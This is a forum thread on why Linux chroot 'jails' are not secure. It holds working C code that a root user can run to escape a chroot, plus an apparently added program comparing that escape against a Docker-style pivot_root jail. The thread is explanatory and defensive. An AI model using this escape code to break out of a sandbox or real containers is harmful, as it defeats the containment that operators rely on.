top | item 11558364


marmight | 10 years ago

You're right insofar as you can't use the chroot command to escape a "chroot jail" because it automatically calls chdir() for you, but any root user can escape one by invoking the following Linux system calls:

  #include <sys/stat.h>
  #include <unistd.h>

  int main(void)
  {
      chdir("/");            /* go to / of "chroot jail" */
      mkdir("foo", 0700);    /* create directory in jail */
      chroot("foo");         /* change / to foo */
      /* fail to chdir("foo"); the cwd is now outside the new root */
      for (int i = 0; i < 64; i++)   /* repeat until . is the real root; ".." at the real root stays put */
          chdir("..");       /* go up a parent: nothing prevents you, since the jail is now foo and you never entered it */
      chroot(".");           /* . is now the real root: change / to it */
      return 0;
  }

This is why the man pages for the Linux system call rightfully put "chroot jail" in scare quotes. They are trivially escaped by a root user making basic Linux system calls, and the man pages even sketch out how for you. Some operating systems attempt to provide more secure chroot jails, but Linux chroot() does not provide this.

comex | 10 years ago

> Some operating systems attempt to provide more secure chroot jails, but linux chroot() does not provide this.

Note that this includes Linux itself with CLONE_NEWNS + pivot_root (which is what Docker does).
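As an added example (not code from marmight, comex or Docker), here is a program that runs both setups side by side. It chroot()s into a fresh temporary directory and runs the ".." escape sketched in the post above, then repeats the same attempt inside a jail built the way comex describes: unshare(CLONE_NEWNS), bind-mount the jail onto itself so it is a mount point, pivot_root onto it, and detach the old root. Each experiment runs in a forked child so the parent is untouched, and it reports whether the process ended up back at the original root (compared by device and inode). It assumes Linux, a writable /tmp, and root (CAP_SYS_CHROOT for the first jail, CAP_SYS_ADMIN for the second); without those it reports NO_PRIVILEGE. The helper names (escape_chroot, chroot_jail_escape, pivot_root_jail_escape) and the 64-level ".." bound are my own choices, not anything from the thread.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of one jail-then-escape experiment; each runs in a forked child so the
   parent's root directory and mount namespace are never touched. */
enum outcome { ESCAPED = 0, CONTAINED = 1, NO_PRIVILEGE = 2, SETUP_FAILED = 3 };

/* Identify the current "/" by (device, inode) so two roots can be compared. */
static int stat_root(struct stat *st) { return stat("/", st); }

static int same_root(const struct stat *a, const struct stat *b) {
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* The escape from the post above: make a subdirectory the root WITHOUT entering it,
   then walk ".." from the cwd, which now sits outside the root. */
static int escape_chroot(void) {
    if (chdir("/") != 0) return -1;
    if (mkdir("foo", 0700) != 0 && errno != EEXIST) return -1;
    if (chroot("foo") != 0) return -1;     /* root moved to ./foo; cwd did not */
    for (int i = 0; i < 64; i++)           /* 64: assumed depth bound; ".." at the top is a no-op */
        if (chdir("..") != 0) return -1;
    return chroot(".");                    /* "." is the outermost directory we could reach */
}

/* Body of the experiment, executed in the child. jail_with_pivot selects the setup. */
static void child(int jail_with_pivot) {
    struct stat real_root, root_after;
    char tmpl[] = "/tmp/jailXXXXXX";      /* constructed jail location, assumed writable */
    if (stat_root(&real_root) != 0) _exit(SETUP_FAILED);
    const char *jail = mkdtemp(tmpl);
    if (jail == NULL) _exit(SETUP_FAILED);

    if (!jail_with_pivot) {
        /* Plain chroot(): the old root stays reachable through ".." */
        if (chroot(jail) != 0) _exit(errno == EPERM ? NO_PRIVILEGE : SETUP_FAILED);
    } else {
        /* Docker-style: private mount namespace, bind-mount the jail so it is a
           mount point, pivot_root onto it, then detach the old root entirely. */
        char put_old[64];
        snprintf(put_old, sizeof put_old, "%s/oldroot", jail);
        if (unshare(CLONE_NEWNS) != 0 ||
            mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL) != 0 ||
            mount(jail, jail, NULL, MS_BIND, NULL) != 0 ||
            mkdir(put_old, 0700) != 0 ||
            syscall(SYS_pivot_root, jail, put_old) != 0)
            _exit(errno == EPERM ? NO_PRIVILEGE : SETUP_FAILED);
        if (chdir("/") != 0 || umount2("/oldroot", MNT_DETACH) != 0)
            _exit(SETUP_FAILED);
        rmdir("/oldroot");                 /* no mount in this namespace leads back out now */
    }
    if (chdir("/") != 0) _exit(SETUP_FAILED);

    if (escape_chroot() != 0 && errno == EPERM) _exit(NO_PRIVILEGE);
    if (stat_root(&root_after) != 0) _exit(SETUP_FAILED);
    _exit(same_root(&real_root, &root_after) ? ESCAPED : CONTAINED);
}

static enum outcome run_experiment(int jail_with_pivot) {
    pid_t pid = fork();
    if (pid < 0) return SETUP_FAILED;
    if (pid == 0) { child(jail_with_pivot); _exit(SETUP_FAILED); }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return SETUP_FAILED;
    return (enum outcome)WEXITSTATUS(status);
}

/* Plain chroot() jail: ESCAPED when run as root, never CONTAINED. */
enum outcome chroot_jail_escape(void) { return run_experiment(0); }

/* CLONE_NEWNS + pivot_root jail: CONTAINED even as root, never ESCAPED. */
enum outcome pivot_root_jail_escape(void) { return run_experiment(1); }

int main(void) {
    static const char *names[] = { "ESCAPED", "CONTAINED", "NO_PRIVILEGE", "SETUP_FAILED" };
    printf("chroot jail:     %s\n", names[chroot_jail_escape()]);
    printf("pivot_root jail: %s\n", names[pivot_root_jail_escape()]);
    return 0;
}
```

Build with cc -o jail jail.c and run it as root: the first line reports ESCAPED and the second CONTAINED. The difference is entirely in what ".." can reach: after pivot_root plus umount2(MNT_DETACH), the bind-mounted jail is the root of the mount namespace and the old root is no longer attached anywhere, so chdir("..") from the jail's top directory stays put and the final chroot(".") lands back inside the jail. The program leaves its temporary jail directories in /tmp behind.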

geofft | 10 years ago

Oh! I didn't know Docker used pivot_root, and I was always curious why that call and chroot() both existed. This makes some sense.